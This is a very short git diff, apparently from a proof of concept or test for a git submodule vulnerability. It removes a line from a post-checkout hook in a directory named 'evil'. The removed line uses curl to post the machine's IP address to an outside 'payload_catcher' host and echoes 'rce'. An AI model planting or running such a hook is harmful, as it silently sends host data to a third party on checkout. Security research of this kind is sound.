diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index 0d71ffd..a31c45a 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,3 +1,2 @@ #!/bin/bash -curl -X POST http://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')"; echo 'rce';